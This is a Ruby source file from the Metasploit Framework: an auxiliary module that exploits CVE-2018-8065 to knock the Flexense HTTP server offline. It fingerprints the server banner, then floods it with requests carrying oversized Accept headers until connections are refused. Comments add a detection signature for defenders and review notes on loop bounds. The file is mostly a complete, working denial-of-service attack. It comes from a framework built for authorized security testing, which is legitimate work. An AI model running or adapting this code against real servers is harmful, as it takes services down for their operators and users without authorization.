rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/flexense_http_server_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
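# Auxiliary module for CVE-2018-8065: a denial-of-service condition in the
# Flexense HTTP server, triggered by many requests with long header values.
#
# Detection note: every request built in #run carries a fixed
# `Host: 127.0.0.1` header and an Accept header made only of 'A' characters
# (PacketSize bytes long), sent over short-lived connections to random
# alphabetic paths. That combination is a stable signature for HTTP logs
# and network sensors.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the RPORT / PacketCount / PacketSize options.
  #
  # @param info [Hash] metadata merged with this module's own via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Flexense HTTP Server Denial Of Service',
        'Description' => %q{
          This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
          Vulnerability caused by a user mode write access memory violation and can be triggered with
          rapidly sending variety of HTTP requests with long HTTP header values.

          Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.
        },
        'Author' => [ 'Ege Balci <[email protected]>' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
        'DisclosureDate' => '2018-03-09',
        'Notes' => {
          # The service is expected to go down and stay down.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        # Both options are registered as strings, so #run converts them with
        # to_i before using them as numbers.
        OptString.new('PacketCount', [ true, 'The number of packets to be sent (Recommended: Above 1725)', 1725 ]),
        # The default is drawn once, when the module instance is created.
        OptString.new('PacketSize', [ true, 'The number of bytes in the Accept header (Recommended: 4088-5090', rand(4088..5090) ])
      ]
    )
  end

  # Fingerprints the target by requesting "/" and looking for the server
  # banner in the response.
  #
  # Only the exact string 'Flexense HTTP Server v10.6.24' is matched. The
  # module description says earlier versions are reportedly affected too, so
  # a Safe result here does not show that an older build is unaffected.
  #
  # @return [Exploit::CheckCode] Appears on a banner match, Safe on any other
  #   response, Unknown when the connection or the request fails
  def check
    connect
    sock.put("GET / HTTP/1.0\r\n\r\n")
    res = sock.get
    if res && res.include?('Flexense HTTP Server v10.6.24')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  rescue Rex::ConnectionRefused
    print_error('Target refused the connection')
    Exploit::CheckCode::Unknown
  rescue StandardError
    print_error('Target did not respond to HTTP request')
    Exploit::CheckCode::Unknown
  ensure
    # The original left the probe socket open; close it on every path so the
    # fingerprint request does not leak a connection.
    disconnect
  end

  # Sends up to PacketCount requests with a PacketSize-byte Accept header and
  # reports success once the target starts refusing connections.
  #
  # @return [true, nil] true when the service stopped accepting connections;
  #   otherwise the result of the final print_error
  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    # PacketCount is an OptString. Comparing the Integer counter against the
    # raw datastore value can never be true once the value is a String, which
    # left the loop with no upper bound. Convert it once, like PacketSize.
    packet_count = datastore['PacketCount'].to_i
    print_status("Starting with packets of #{size}-byte strings")

    count = 0
    loop do
      payload = ''
      payload << 'GET /' + Rex::Text.rand_text_alpha(1..30) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << 'Accept: ' + ('A' * size) + "\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        count += 1
        # >= rather than == so a zero or negative PacketCount also terminates.
        break if count >= packet_count
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination! Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout! Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset! Continuing...')
      rescue ::Rex::ConnectionRefused
        # A refused connection is treated as evidence that the service is down.
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      ensure
        # Close the socket even when put raises, so failed sends do not
        # accumulate open connections on the local side.
        disconnect
      end
      # NOTE(review): failed attempts do not advance count, so the loop is
      # bounded by PacketCount only while sends succeed. Confirm whether an
      # attempt cap is wanted for targets that keep timing out.
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end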